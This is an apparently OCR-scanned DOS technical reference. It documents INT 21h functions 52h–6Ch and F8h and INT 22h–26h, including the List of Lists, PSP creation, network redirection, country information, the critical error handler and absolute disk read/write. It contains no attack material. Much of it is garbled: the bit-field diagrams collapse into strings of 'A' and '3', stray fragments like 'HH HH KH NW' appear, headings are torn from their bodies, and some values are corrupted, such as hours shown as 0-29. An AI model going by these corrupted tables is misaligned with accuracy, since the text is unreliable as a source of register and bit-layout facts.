-4 word pointer in DOS code segment of unread CON input; 
0 indicates no unread input (DOS 3.x) 

-2. word segment of first Memory Control Block (-MCB-) 

00 dword pointer to first -DRIVE PARAMETER TABLE- (A:) in chain 

04 dword pointer to DOS -System File Table- (SFT) 

08 dword pointer to $CLOCK device driver 

OC dword pointer to CON device driver 

10 byte number of logical drives in system 

11. word maximum bytes/block of any block device 

13 dword pointer to DOS cache buffer header 

17 18bytes NUL device header, first 4 bytes of device header 
point to the next device in device chain 


ADOS 3.0 Specific Information 
% Offset Size Description 


10 byte number of block devices 

11. word max sector size used by DOS prior to loading block 
device drivers; limits allowable device sector size 

13 dword pointer to DOS cache buffer header 

17 dword pointer to drive information table 

1B byte value of LASTDRIVE command in CONFIG.SYS 

1C dword pointer to STRING= workspace area 

20 word size of STRING area (CONFIG.SYS value of STRING=x) 

22 dword -FCB- file table pointer 

26 word number of protected FCBs 

28 18bytes NUL device header, first 4 bytes of device header 
point to the next device in device chain 


ADOS 3.1-3.3 Specific Information 
% Offset Size Description 


10 word max sector size used by DOS prior to loading block 
device drivers; limits allowable device sector size 

12 dword pointer to DOS cache buffer header 

16 dword pointer to drive information table 

1A dword -FCB- file table pointer 

1E word number of protected FCBs 

20 byte number of block devices 

21 byte value of LASTDRIVE command in CONFIG.SYS 

22 18bytes NUL device header, first 4 bytes of device header 
point to the next device in device chain 

34 byte number of JOIN'ed drives 
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ADOS 4.x Specific Information 
% Offset Size Description 


10 word max sector size used by DOS prior to loading block 
device drivers; limits allowable device sector size 

12 dword pointer to DOS cache buffer header 

16 dword pointer to drive information table 

1A dword FCB file table pointer 

1E word number of protected FCBs 

20 byte number of block devices 

21 byte value of LASTDRIVE command in CONFIG.SYS (default 5) 

22  18bytes NUL device header, first 4 bytes of device header 
point to the next device in device chain 

34 byte number of joined drives 

35. word pointer within IBMDOS code segment to list of special 
program names 

37 dword pointer to resident IFS utility function 

3B dword pointer to chain of installable file system drivers 

3F. word the x in BUFFERS x,y (rounded up to multiple of 30 
if EMS is used) 

41. word the y in BUFFERS x,y 

43 byte boot drive (1=A:) 

44 byte ??? 

45 byte extended memory size in K bytes 


- see -Bibliography- references for Bernd Schemmer & "Undocumented DOS" 
- see -—INDOS- -INT 21,5D- 

:int 21,53 

NAINT 21,53 - Generate Drive Parameter Table (Undocumented) 


AH = 53h 
DS:SI = address of BIOS Parameter Block (-BPB-) 
ES:BP = pointer to buffer to hold first Drive Parameter Table (-DPT-) 


returns: 
ES:BP = pointer to buffer containing the first Drive Parameter Table 
in chain 


- available since DOS 2.0+ 
- translates BPB into a DOS Disk Parameter Table 
- see -—INT 21,32- -INT 21,52- 

:int 21,54 

AINT 21,54 - Get Verify Setting 


AH = 54h 


on return: 
AL = 00 verify off 
= 01 verify on 
- returns value of disk read after write verification flag 
- see -INT 21,2E- 
:int 21,55 
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AINT 21,55 - Create New PSP  (Undocumented) 


AH = 55h 
DX = New PSP segment address 
SI = memory size value to place in -PSP- offset 02h (DOS 3+) 


returns nothing 
- the following should be observed when using this function 


Allocate memory for the PSP and program code (-INT 21,48-) 
Duplicate the PSP (-INT 21,55-) 

Load program code into allocated segment above the new PSP 
Save Current PSP 

Set PSP to the PSP just created (-INT 21,50-) 

Jump to start of code if .COM otherwise handle relocation, 

setup stack and registers 


(o MoMeMeMee) 


- similar to -INT 21, 26- except the PSP is setup by DOS 

- increments reference count in -SFT- for all inherited files 

- files flagged as not inheritable are marked as closed in the 
new PSP 

- invoked by -INT 21, 4B- 


- see -UNDOC- -INT 21, 4B- -INT 21, 26- 
:int 21,56 
NINT 21,56 - Rename File 


AH = 56h 
DS:DX = pointer to old ASCIIZ path/filename 
ES:DI = pointer to new ASCIIZ path/filename 


on return: 
AX = error code if CF set (see -DOS ERROR CODES-) 


- supports full pathnames and allows renaming files across 
directories and in DOS 3.x allows renaming subdirectories 
- does not support use of wildcards unless invoked from via 
-INT 21,5D- in which case error code 12h is returned 
- unpredictable result may occur if an opened file is renamed 
- see -Bibliography- reference to "Undocumented DOS" 
:int 21,57 
NINT 21,57 - Get/Set File Date and Time Using Handle 


AH = 57h 
AL = 00 get date and time 
= 01 set date and time 
= 02 ??? (DOS 4.0+ undocumented) 
= 03 ??? (DOS 4.0+ undocumented) 
= 04 ??? (DOS 4.0+ undocumented) 
BX = file handle 
CX = time to set (if setting) 
DX = date to set (if setting) 


ES:DI = pointer to buffer to contain results 


on return: 

error code if CF set (see —DOS ERROR CODES-) 
file time (if reading, see below) 

file date (if reading, see below) 


(©) 
x 
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% Time encoding: 


3F3E3D3C3B3A393837363534333231303 Time in CX 

3 3 3 3 3 s 3 3 s 3 3 AAAAAAAAAAAAKA two second incr (0-29) 
3 3 3 3 3 AAAAAAAAAAAAAAAAKAAAAAAAA minutes 0-59) 
AAAAAAAAAARAAAAAAAAARAAAARAAAAAAAAAA hours (0-29) 


% Date Encoding 
3F3E3D3C3B3A393837363534333231303 Date in DX 


3 3 3 3 3 83 3 3 3 3 3 AAAAAAAAAAAAA day (1-31) 
3 3 3 3 3 3 3 AAAAAAAAAAAAKAKAKAAA month (1-12) 


AINT 21,58 - Get/Set Memory Allocation Strategy 
A(Undocumented, DOS 3.x) 


AH = 58h 
AL = 00 get strategy code 
= 01 set strategy code 
BX = strategy code (when AL = 01) 
= 00 first fit (default) 
= 01 best fit 
= 02 last fit 
on return: 
AX strategy code if CF clear 


error if CF set, see —DOS ERROR CODES- 


- defaults to first fit, first block large enough is chosen 
- in first fit, DOS searches the -MCB- chain from low addresses to 
high for the first block large enough to fill the request. For 
best fit, DOS searches all memory blocks for the closest fit. 
In last fit, DOS starts at high addresses and works downward 
and uses the high part of the chosen block 
- any strategy value greater than 2 defaults to 2, but the last value 
set, even if incorrect, is the value returned by the get strategy 
:int 21,59 
NAINT 21,59 - Get Extended Error Information (DOS 3.0+) 


AH = 59h 

BX = 00 for versions 3.0, 3.1, 3.2 

on return: 

AX = extended error code (see -DOS ERROR CODES-) 
= 0 if no error 

BH = error class 

BL = suggested action 

CH = locus 


- may be called after any -INT 21- function or from 
-INT 24- when an error is returned 
- must be called immediately after the error occurs 
registers CX, DX, DI, SI, BP, DS and ES are destroyed 
sint 21, 5a 
AINT 21,5A - Create Temporary File (DOS 3.0+) 
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CX = attribute 
DS:DX = pointer to ASCIIZ path ending in '\' 


on return: 
AX = handle if call CF clear 

= error code if CF set (see -DOS ERROR CODES-) 
DS:DX = pointer to updated ASCIIZ filespec 


- creates files with random names with any combination of 
the following attributes: normal, system and hidden 
- ending backslash is required 


:int 21,5b 
AINT 21,5B - Create File (DOS 3.0+) 


5B 
attribute 
DS:DX = pointer to ASCIIZ path/filename 


on return: 
handle if CF not set 
error code if CF set (see -DOS ERROR CODES-) 


- standard method of opening files 
- returns a file handle of a file opened with specified 
attributes (combinations of normal, system and hidden) 


:int 21,5c 

AINT 21,5C - Lock/Unlock File Access (DOS 3.0+) 
AH = 5C 
AL = 00 lock file 

= 01 unlock file 

BX = file handle 
CX = most significant word of region offset 
DX = least significant word of region offset 
SI = most significant word of region length 
DI = least significant word of region length 
on return: 


AX = error code if CF set (see -DOS ERROR CODES-) 


- used for networking and multi-tasking system to preserve 
data integrity 
- duplicated handles inherit access to locked regions 
- EXEC'd programs do not inherit access to locked regions 
:int 21,5d 
NINT 21,5D - Critical Error Information (Undocumented, DOS 3.x+) 


% See second reference below for more information about this interrupt 
% information presented here is incomplete 

AH = 5D 

AL 00 server function call (DOS 3.1+) 


01 commit all files (DOS 3.1+) 
02 SHARE: close file by name (DOS 3.1+) 
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03 SHARE: close all files for given computer (DOS 3.1+) 

04 SHARE: close all files for given process (DOS 3.1+) 

05 SHARE: get open file list entry (DOS 3.1+) 

06 get address of DOS swappable area into DS:SI (DOS 3.0+) 
get network redirected printer mode (DOS 3.1+) 

08 set network redirected printer mode (DOS 3.1+) 

09 flush network redirected printer output (DOS 3.1+) 

0A set extended error information (DOS 3.1+) 

OB get DOS swappable data areas (DOS 4.x+) 


HH HH KH NW 
© 
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DS:DX = pointer to 18 byte DOS Parameter List (DPL, if AL=00) 

= pointer to 9 byte data block of the form (AL=0A): 
% Offset Size Description 

00 word extended error code to set 
02 dword pointer to driver address to set 
06 byte action code to set 
07 byte class code to set 
08 byte locus code to set 

on return: 


DS:SI = (if AL was 6) address of critical flag of the form: 
% Offset Size Description 


00 word extended error code 

02 byte action code 

03 byte class code 

04 byte pointer to driver address 


- function 0 copies 18 bytes from DS:SI to the DOS internal 
register-save area; this data will be placed in the registers 
when DOS returns to the caller thereby circumventing the DOS 
register save logic 

- may be used by a TSR to prevent accidental changing of an error 
code and causing problems in the foreground process 

- see -bibliography- references for "Undocumented DOS" and "DOS 
Programmers Reference" 


- see -INT 21,59- 
:int 21,5e 
AINT 21,5E AL=0 Get Machine Name (DOS 3.1+) 


5E 
00 get machine name 
DS:DX = far pointer to buffer receiving name string 


on return: 

= error code if CF set, (invalid function) 

= 0 if name not defined 

> 0 if name defined 

= NETBIOS name number, if CH not 0 

DS:DX = far pointer to buffer containing string if CH not 0 


- returns pointer to an ASCIIZ string identifying the 
computer on a Microsoft network 

- output string is a 15 bytes long, padded with blanks and 
null terminated 

- unpredictable if called without file sharing loaded 
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NINT 21,5E AL=01 Set Machine Name (DOS 3.1+) 


AH = 5E 
AL = 01 set machine name 
CH = 00 undefine name 
= any other value means to define name 
CL = name number 
DS:DX = pointer to 15 byte, blank padded ASCIIZ name string 
on return: 


AX = error code if CF set, (invalid function) 


- specifies the network machine name on a Microsoft network 
- unpredictable if called without file sharing loaded 


NAINT 21,5E AL=02 Set Printer Setup (DOS 3.1+) 


AH = 5E 

AL = 02 set printer setup 

BX = redirection list index (see -INT 21,5F- AL=2) 
CX = length of setup string 


DS:SI = far pointer to printer setup string 


on return: 
AX = error code if CF set, (invalid function) 


- see INT 21,5F subfunction 2 for information on obtaining the 
redirection list index 
- fails if file sharing is not loaded 


NAINT 21,5E AL=03 Get Printer Setup (DOS 3.1+) 


AH = 5E 
AL = 03 get printer setup 
BX = redirection list index (see -INT 21,5F- AL=2) 


ES:DI = far pointer to buffer to receive setup string 


on return: 
AX = error code if CF set 


- see INT 21,5F subfunction 2 for information on obtaining the 
redirection list index 
- fails if file sharing is not loaded 


NINT 21,5E AL=04 Set Printer Mode (DOS 3.1+) 


AH = 5E 

AL = 04 set printer setup 

BX = redirection list index (see INT 21,5F AL=2) 

DX = printer mode to set (bit zero is set for binary mode and clear 


for translated/text mode) 
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on return: 
AX = error code if CF set 


- see INT 21,5F subfunction 2 for information on obtaining the 
redirection list index 

- fails if file sharing is not loaded 

- issues -INT 2F,11- and -INT 2F,1F- 


NINT 21,5E AL=05 Get Printer Mode (DOS 3.1+) 


AH = 5E 

AL = 05 set printer setup 

BX = redirection list index (see INT 21,5F AL=2) 

on return: 

AX = error code if CF set 

DX = printer mode where bit zero is set for binary mode and 


clear for translated mode 


- see -INT 21,5F- subfunction 2 for information on obtaining the 
redirection list index 
- fails if file sharing is not loaded 
- issues -—INT 2F,11- and -INT 2F,1F- 
sint 21, 5f 
NINT 21,5F AL=00 Get Redirection Mode (DOS 3.1+) 


AH = 5F 
AL = 00 
BL = redirection type 
= 03 printer 
= 04 disk drive 
on return: 
AX error code if CF is set 
BH device redirection state 


00 redirection off 
01 redirection on 


- determines if disk or printer redirection is enabled 
- fails if file sharing is not loaded 


NINT 21,5F AL=01 Set Redirection Mode (DOS 3.1+) 


AH = 5F 

AL = 01 

BH = device redirection state 
= 00 turn redirection off 
= 01 turn redirection on 

BL = redirection type 


03 printer 
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= 04 disk drive 


on return: 
AX = error code if CF is set 


- enables or disables disk or printer redirection 
- local devices are used when redirection is off 
- fails if file sharing is not loaded 


NINT 21,5F AL=02 Get Redirection List Entry (DOS 3.1+) 


AH = 5F 
AL = 02 
BX = redirection list index 
DS:SI = far pointer to a 16 byte buffer to hold device name 
ES:DI = far pointer to a 128 byte buffer to hold network name 
on return: 
AX = error code if CF is set 
= 1 invalid function code 
= 12 no more files 
BH = device status flag, 
bit 0 = 0 device valid 
bit 0 = 1 device invalid 
BL = device type 
= 3 printer 
= 4 drive 
CX = stored parameter value 
DS:SI = far pointer to ASCIIZ local device name 
ES:DI = far pointer to ASCIIZ network name 


- value returned in CX is the value previously passed to 
INT 21,5F with subfunction 3 in register CX 

- registers DX and BP are destroyed 

- fails if file sharing is not loaded 


NINT 21,5F AL=03 Redirect Device (DOS 3.1+) 


AH = 5F 
AL = 03 
BL = device type 
= 3 if printer 
= 4 if drive 
CX = parameter to save for caller 


DS:SI = far pointer to ASCIIZ local device name 
ES:DI = far pointer to ASCIIZ network name followed 
by ASCIIZ password 


on return 
AX = error code if CF is set 
ai È invalid function code or 


invalid source or destination string format or 
source device already redirected 

3 path not found 

5 access denied 

8 insufficient memory 


- parameter passed in CX can later be retrieved by calls 
to INT 21,5F subfunction 2 
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- local device name in DS:SI can be a drive designator 
(D:), a printer name (PRN or LPTx), or a null string 

- when a null string is followed by a password is used, DOS 
tries granting access to the network directory using the 
given password 

- fails if file sharing is not loaded 


NINT 21,5F AL=04 Cancel Device Redirection (DOS 3.1+) 


DS:SI = far pointer to ASCIIZ local device name 


on return 
AX error code if CF set 
01 function code invalid 
ASCIIZ string is not an existing source device 
OF redirection paused on server 


- local device name in DS:SI can be a drive designator 
(D:), a printer name (PRN or LPTx), or a string beginning 
with 2 backslashes "\\" 

- when two backslashes are used for the string the connection 
between the local machine and network directory terminates 

- fails if file sharing is not loaded 


NINT 21,5F AL=05 Get Redirection List Extended Entry (DOS 4.0+) 


AH = 5F 
AL = 05 
BX = redirection list index 
DS:SI = pointer to buffer to receive ASCIIZ source device name 
ES:DI = pointer to buffer to receive ASCIIZ network path 
on return 
AX = error code if CF set 
BH = device status flag (bit 0 clear if valid) 
BL = device type 
= 03 printer device 
= 04 disk device 
CX = stored user parameter value 
BP = NETBIOS local session number 
DS:SI = pointer to buffer containing ASCIIZ source device name 
ES:DI = pointer to buffer containing ASCIIZ network path 


- retrieves the status, type, source and target of a given redirection 


- fails if file sharing is not loaded 
NINT 21,5F AL=06 Get Redirection List (DOS 4.0+) 
5F 
06 
- no information is currently available for this subfunction 
:int 21,60 
AINT 21,60 - Get Fully Qualified File Name (Undocumented 3.x+) 
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AH = 60h 
DS:SI = pointer to ASCIIZ string containing unqualified filename 
ES:DI = pointer to 128 byte buffer to contain fully qualified filename 


on return: 
ES:DI = address of fully qualified filename string 
AH = error code if CF set 


- undocumented, available in DOS 3.x+ 
- does not check for file existence, simple provides a fully 
qualified filename for the given filespec 
- this function ignores ASSIGN'ed, JOIN'ed, SUBST'ed and network 
redirections and returns the true path name 
- returned string is in upper case and has forward slashes replaced 
by back slashes; filename always begins with "d:" or "\\" format 
- AL register is destroyed 
- supported by 0S/2 1.1 compatibility box 
:int 21,62 
NAINT 21,62 - Get PSP address (DOS 3.x) 


AH = 62h 


on return: 
BX = segment address of current process 


- this is useful for TSR's to access their own file handles 
- for DOS 2.x use -INT 21,51- 


- see also -INT 21,50- 
:int 21,63 
NINT 21,63 - Get Lead Byte Table (MSDOS 2.25 only) 


% See below for information on the Asian INT 21,63 specifications 
AH 63h 
AL 00 get address of system lead byte table 


01 set or clear interim console flag 
02 get value of interim console flag 


DL 00 clear interim console flag (when AL=01) 
01 set interim console flag (when AL=01) 
on return 


AX = error code if CF set 
DS:SI = far pointer to lead byte table (AL=00) 
DL = value of interim console flag (AL=02) 


- available only in MSDOS 2.25 

- provides multiple byte character support 

- function 00, returns the address of system table containing 
legal lead byte ranges 

- function 01 & 02 set and get the interim console flag which 
determines whether interim bytes are returned on some console 
functions 

- all registers except CS:IP and SS:SP may be destroyed 
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NINT 21, 


AH 
AL 


DL 


DS: 


DL 


:int 21, 
NINT 21, 


AH 
AL 


re 


:int 21, 
NINT 21, 


AH 
AL 


BX 


63 - Get Lead Byte Table (Asian DOS 3.2+) 


00 get address of Double Byte Character Set (DBCS) lead table 
01 set Hongeul (Korean) input mode 

get Hongeul (Korean) input mode 

new keyboard input mode 

00 return completely formed characters only 

01 return partially formed characters also 


HH HH HO HI 
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return 

= 00 on success 

= FF if function not supported 

SI = pointer to DBCS table (function 00) 

current keyboard input mode (function 02) 

00 only completely formed characters are accepted 
01 partially formed characters are accepted 


available only in Asian MSDOS 3.2+ 

provides Asian multiple byte character support 

all registers except CS:IP and SS:SP may be destroyed 
DOS 4.0 returns an empty list 


64 

64 - Set Device Driver Look Ahead (Undocumented) 

= 64h 

= value for switch 
00 causes DOS to perform look ahead to the device driver 

before execution of -INT 21,1-, -INT 21,8- and -INT 21, A- 

other - no look ahead is performed 

turns ??? 


DOS internal; should not be called by user program 

switch defaults to zero 

undocumented; since DOS 3.3 

some other subfunctions are know to have existed since DOS 3.2 but 
details on their functionality are incomplete 

65 

65 - Get Extended Country Information (DOS 3.3+) 


01 get extended country information 
02 get pointer to character translation table 
04 get pointer to filename character translation table 
05 get pointer to filename terminator table 
get pointer to collating sequence 
07 get segment of DCBS vector (DOS 4.x) 
20 country dependant character capitalization (DOS 4+) 
21 country dependant string capitalization (DOS 4+) 
22. country dependant ASCIIZ string capitalization (DOS 4+) 
23 determine if character represents country relative 
Yes or No response (DOS 4+) 
AO country dependant filename character capitalization (DOS 4+) 
A1 country dependant filename string capitalization (DOS 4+) 
A2 country dependant ASCIIZ filename capitalization (DOS 4+) 
code page (-1 = current global code page, AL < 20h) 


HO HH HH HH HH HO ON 
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CX = amount of data to return 
= length of string (AL=21h, A1h) 
DX = country ID (-1 = current country, AL < 20h) 
DL = character to capitalize or test (AL=20h, 23h, A©Oh) 
DH = second character if double byte character (AL=28h) 
ES:DI = pointer to output buffer (AL < 20h, see tables below) 
DS:DX = pointer to string to capitalize (AL=21h, 22h, Aih, A2h) 
on return 
AX = error code if CF is set (see -DOS ERROR CODES-) 
= 00 NO response if (AL was 28h) 
= 01 YES response if (AL was 23h) 
= ©2 not a yes or no response (AL was 23h) 
CX = amount of data returned 
DL = capitalize character (AL=20) 


ES:DI pointer to returned table of the forms: 


% Offset Size Table for Function 01 


00 byte country id = 01 

01 word size (38 or less) 

03 word country id 

05 word code Page 

07 word date Format 

09 5bytes currency symbol string (ASCIIZ) 
OE 2bytes thousands separator string (ASCIIZ) 
10 2bytes decimal separator string (ASCIIZ) 
12 2bytes date separator string (ASCIIZ) 

14 2bytes time Separator string (ASCIIZ) 

16 byte currency symbol location 

17 byte currency decimal places 

18 byte time format 

19 dword extended ASCII map call address 
1D 2bytes list separator string (ASCIIZ) 

1F 10bytes reserved 


% Offset Size Table for Function 2 
00 byte country Id = 02 
01 dword pointer to uppercase table 


% Offset Size Table for Function 4 
00 byte country Id = 04 
01 dword pointer to filename character translation table 


% Offset Size Table for Function 5 
00 byte country Id = 05 
01 dword pointer to filename uppercase table 


% File Terminator Table for Function 5 
00 word table size 
02 7bytes unknown 
09 byte length of following data 
OA nbytes list of filename termination characters, ex: 
SR TIE e 


% Offset Size Table for Function 6 
00 byte country Id = 06 
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01 dword pointer to collating table 


% Offset Size Table for Function 7 


00 byte country Id = 07 
01 dword pointer to byte pair table 


functions A0, A1, A2 are implemented in DOS 4.x but don't work 


:int 21,66 
AINT 21,66 - Get/Set Global Code Page (DOS 3.3+) 
AH = 66h 
AL = 01 get global code page 
= 02 set global code page 
BX = active code page if setting 
DX = system code page if setting 
on return 
AX = error code if CF set (see -DOS ERROR CODES-) 
BX = active code page (for AL=1 only) 
DX = system code page (for AL=1 only) 


moves country data from COUNTRY.SYS to country memory table 


:int 21,67 
AINT 21,67 - Set Handle Count (DOS 3.3+) 
AH = 67h 
BX = new maximum open handles allowed 
on return 
CF = 0 if successful 
= 1 if error 
AX = error code if CF is set (see -DOS ERROR CODES-) 


:int 21, 
NINT 21, 


AH 
BX 


on 


gives program control of the number of files simultaneously open 
if CX is less than the current number of open files the change 
will take effect when the number of open handles falls below 
the new limit 

this function allows the application to use more than 20 files, 
up to the FILES=N limit 

earlier copies of IBM DOS 3.3 sometimes incorrectly allocates 
memory (up to 64K) if an even number of handles is requested 
only the first 20 files handles are copied to a child process 
regardless of the max number of files 

it is possible to allocate more than 255 file handles but it is 
difficult to use more than 255 


see -—SFT- ——FILE HANDLES- 
68 
68 - Flush Buffer Using Handle (DOS 3.3+) 


68h 
file handle 


return 
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AX = error code if CF set (see -DOS ERROR CODES-) 


- flushes DOS buffers to disk, does not update directory entry 


:int 21,69 
AINT 21,69 - Get/Set Disk Serial Number (Undocumented DOS 4+) 
AH = 69h 
AL = 00 get serial number 
= 01 set serial number 
BL = drive (0 = default, 1=A:, 2 = B: 


DS:DX = buffer to contain extended BIOS Parameter Block (-BPB-, AL=0) 
= disk information to set of the form: 


% Offset Size Description 
00 word info level (zero) 
02 dword disk serial number (binary) 
06 1ibytes volume label or "NO NAME " if not present 
11 8bytes filesystem type string "FAT12 " or "FAT16" 
returns: 


CF = set on error 
AX = error code if CF set 
01 network drive not supported 
05 no extended BPB found on disk 
CF = clear if successful and value in AX is destroyed 


AL = 00 buffer filled from Extended BPB on disk 
= 01 disk Extended BPB updated from buffer 
DS:DX = pointer to returned data, when AL = 0 


- copies data from Extended BIOS Parameter Block to buffer 

- no critical error is generated on error 

- does not work on network drives (returns 01) 

- returned buffer (after offset 2) is similar to offsets 27 through 
3D of the Extended BPB found in the boot record 


see -INT 21,59- 
sint 21, 6c 
NAINT 21,6C - Extended Open/Create (DOS 4.x+) 


AH = 6C 

AL = 00 

BX = open mode (see below) 

CX = file attribute (see -FILE ATTRIBUTES-, bits 15-8 are zero) 
DX = function control indicator (see below) 


DS:SI = ASCIIZ filespec 


returns: 
AX handle if CF clear 
error code if CF set (see -DOS ERROR CODES-) 


CX = 01 file opened 
= 02 file created and opened 
= 03 file truncated and opened (replaced) 
CF = 0 if successful 
= 1 if error 
% Open Mode in BX: 


3F3E3D3C3B3A393837363534333231303 BX (Open Mode) 
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% 
% 


% 


% 
% 


% 
% 


3 s 3 s 3 AAAAAAAAA read/write access mode 

3 s 3 3 AAAAAAAAA reserve (must be 0) 

3 AAAAAAAAAAAAA sharing mode 

AAAAAAAAAAAAA 1 = private, 0 = inheritable 
AAAAAAAAAKRAAAAAAAAAAA reserved 

AAAAAAAAAAAAAAAAAAAAA © = call INT 24, 1= ignore INT 24 


W_Wd Wè W Wù W wW 
WU_Wd W Wù W W 


Sgrena i iran i eeerued 


Read/Write Access bits: Sharing Mode bits: 

210 654 

000 read access 000 compatibility mode 

001 write access 001 read/write access 

010 read/write access 010 write access denied 


011 read access denied 
100 full access 


Function Control Indicator in DX: 


3F3E3D3C3B3A393837363534333231303 DX (Function Control) 
3 3 3 3 3 3 3 3 3 3 3 3 AAAAAAAAARA file existence behavior 
333 3 3 3 3 3 _ AAAAAAAAAAAAAAAAAA creation behavior 


File Existence Behavior bits: 


0000 if file exist, generate error, take no action 
0001 if file exists, open file 
0010 if file exists, truncate and open 


Creation Behavior bits: 

7654 

0000 if file does not exist, generate error, take no action 
0001 if file does not exist, create 


:int 21, f8 
AINT 21,F8 - Set OEM Int 21 Handler (functions F9-FF, Undocumented) 


pointer to OEM handler for INT 21H calls F9 through FF 
FFFF:FFFF to reset to original handlers 


- DOS is set up to allow ONE handler for all 7 function calls. 
Any call to these handlers will set the CF and AX 
will contain 1 if they are not initialized. The handling 
routine is passed all registers just as the user set them. 
The handler should exit with an -IRET-. 


sint 22 
AINT 22 - Program Terminate 


no input data 


- not an interrupt, but a vector to the terminate address 
- copied to -PSP- offset OAh during program load 
- do not execute this interrupt directly 


sint 23:ctrl-c 
NINT 23 - Control-Break Exit Address 
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AAAAAAAAAAAAAARAAAKAAA O = normal write, 1 = flush each write 


no input data 


sint 24: 
NINT 24 


no 


on 
AH 


not an interrupt but a pointer to a routine that is called when a 
DOS function detects a -Ctrl-Break- or Ctrl-C has been pressed 
resulting in a "Break condition" 

a Break condition is detected if DOS's internal Break flag is 
found set by -INT 1B- or the next word in the BIOS keyboard buffer 
is a scan code representing one of the Break key combinations. 

If a matching scan code is found, the keyboard buffer head pointer 
is incremented by 2 (which effectively removes the AC keycode), the 
AC is printed and then INT 23 is called. 

disabling the abort is easy, but to disable the AC from appearing 
you must either not use any of the DOS 1/0 functions that check 
for Break or you must trap the Ctrl-C keypress from within INT 9. 
Another method is to scan the BIOS keyboard buffer and delete any 
Break key combinations. 

Ctrl-Break empties the keyboard buffer by resetting the keyboard 
head and tail pointers then places a 0000h at the queue head. It 
then sets an internal "Break" flag. DOS subfunctions that check 
for Break see this and then issue INT 28h. DOS does not detect 
INT 1B using the keyboard buffer, but uses it's own internal flag. 
Alt-Keypad-3 and Ctrl-2 also result in this interrupt 

Ctrl-C places 2E03h in the BIOS keyboard buffer while Ctrl-2 
places 0300h and Alt-Keypad-3 places 0003h; none of these key 
combinations empty the keyboard like Ctrl-Break but all result 

in a AC being displayed; note that all three produce scan codes 
containing '03' 

since DOS checks only the first word of the keyboard buffer 
Ctrl-C, Ctrl-2 and Alt-Keypad-3 are only detected if they are the 
first word in the buffer while Ctrl-Break is detected via the 
internal flag and takes effect as soon as it's detected. 

do not execute this interrupt directly 

see also -INT 9- 

critical error handler 

- Critical Error Handler 


input data 


entry to INT 24: 

bit 7 of register AH is set to one if other than disk error 

bit 7 of register AH is set to zero if disk error 

AL failing drive number 

AH bits 0-2 indicate affected disk area and read/write status 


3534333231303 AH 
3 3 3 3 3 AAAAA read = 0, write = 1 
3 3 3 AAAAAAAA 00=DOS, 01=FAT, 10=DIR, 11=data area 
3 3 AAAAAAAAA O=FAIL not allowed, 1=FAIL allowed 
3 AAAAAAAAAA O=RETRY not allowed, 1=RETRY allowed 
AAAAAAAAAAA O=IGNORE not allowed, 1=IGNORE allowed 
= error code in lower byte 
:SI = pointer to device header control block where additional 
information about the error can be found 


exit: 
action code determining exit behavior 
00 ignore error 

retry 

02 terminate through -INT 23- 

03 fail system call (DOS 3.x+) 


HH HH 
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% Error Codes in low order byte of DI: 


00 write protect error 
01 unknown unit 

02 drive not ready 

03 unknown command 

04 data error (bad CRC) 
05 bad request structure length 
06 seek error 

07 unknown media type 
08 sector not found 

09 printer out of paper 
OA write fault 

OB read fault 

OC general failure 


% Users Stack at Entry to Error Handler: 


(top of stack) 
IP DOS code next instruction pointer 


FLAGS DOS's flags 


SI |- User's registers at entry to INT 21 function 


IP User code next instruction pointer 


- on entry registers are setup for a retry operation 

- user routine must issue an IRET or simulate an IRET 

- -INT 21,0- through -INT 21,C- and -INT 21,59- can safely be invoked 
from the handler. Other calls may destroy DOS's stack 

- handler must preserve register SS,SP,DS,ES,BX,CX,DX 

- choosing ignore can show side effects, since it causes DOS 
to continue as if it the call were successful 

- if an improper action code is specified in DOS 3.x it is changed: 
if IGNORE is invalidly specified, action is converted to FAIL 
if RETRY is invalidly specified, action is converted to FAIL 
if FAIL is invalidly specified, action is converted to ABORT 

- IGNORE requests are converted to FAIL for -FAT- and -DIR- disk 
errors and network critical errors 

- if the user routine wishes to handle the error instead of passing 
it to DOS, it must restore the user program registers from the 
stack and remove all but the last 3 words from the stack (FLAGS, 
CS, IP) and issue an -IRET- 

- do not execute this interrupt directly 

- -INDOS- flag is cleared on INT 24 (see -INT 21,34-) 

sint 25 


NAINT 25 - Absolute Disk Read 
AL = logical drive number (0=A:, 1=B:, 2=C:, ...) 
CX = number of sectors to read 
= -1 if DOS 4.x (control block pointer is in DS:BX) 
DX = starting logical sector number (see below for DOS 4.x+) 
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DS:BX = pointer to data buffer 
= pointer to control block (DOS 4.x+, see below) 
on return: 


AH = error code if CF set: 
01 bad command 
02 bad address mark 
03 write protect 
04 sector not found 
08 DMA failure 
10 data error (bad CRC) 
20 controller failed 
40 seek failed 
80 attachment failed to respond 
AL = BIOS error code if CF set 
00 write protect error 
01 unknown unit 
02 drive not ready 
03 unknown command 
04 data error (bad CRC) 
05 bad request structure length 
06 seek error 
07 unknown media type 
08 sector not found 
OA write fault 
OB read fault 
OC general failure 


AControl Block Format (DOS 4.x): 
% Offset Size Description 


00 dword starting sector 
04 word number of sectors to read 
06 dword pointer to buffer 


- reads disk sectors into buffer at DS:BX or DS:[BX+6] 

- after calling this interrupt the flags register remains on the 
stack and must be popped manually 

- sectors are logical sectors starting at the beginning of a 
logical disk; each DOS partition on a drive unit is considered 
one logical drive and has it's own logical sector numbers with 
track 0 starting at the first track in the partition 

- this function uses logical drives, and is susceptible to ASSIGN 

- physical sector numbers can be converted to and from DOS sector 
numbers with the following formulas: 


dos_sector = (sector - 1) + (head * sectors_per_track) + 
(track * sectors_per_track * num_heads) 


physical_sector = 1 + (dos_sector MOD sectors_per_track) 
physical _head = (dos_sector / sectors_per_track) MOD num heads 
physical_track = dos_sector / (sectors_per_track * num_heads) 


- see -INT 13, STATUS- 
sint 26 


AINT 26 - Absolute Disk Write 
AL = logical drive number (0=A:, 1=B:, 2=C:, ...) 
CX = number of sectors to write 
= -1 if DOS 4.x (control block pointer is in DS:BX) 
DX = starting logical sector number (see below for DOS 4.x+) 
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DS 


on 
AH 


AL 


:BX = pointer to data buffer 
= pointer to control block (DOS 4.x+, see below) 

return: 
= error code if CF set: 

01 bad command 

02 bad address mark 

03 write protect 

04 sector not found 

08 DMA failure 

10 data error (bad CRC) 

20 controller failed 

40 seek failed 

80 attachment failed to respond 
= BIOS error code if CF set 


00 write protect error 
01 unknown unit 

02 drive not ready 

03 unknown command 

04 data error (bad CRC) 
05 bad request structure length 
06 seek error 

07 unknown media type 
08 sector not found 

OA write fault 

OB read fault 

OC general failure 


AControl Block Format (DOS 4.x): 


% of 


sint 27 
AINT 27 


DX 
CS 
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fset Size Description 


00 dword starting sector 
04 word number of sectors to write 
06 dword pointer to buffer 


writes disk sectors from buffer at DS:BX or DS:[BX+6] 

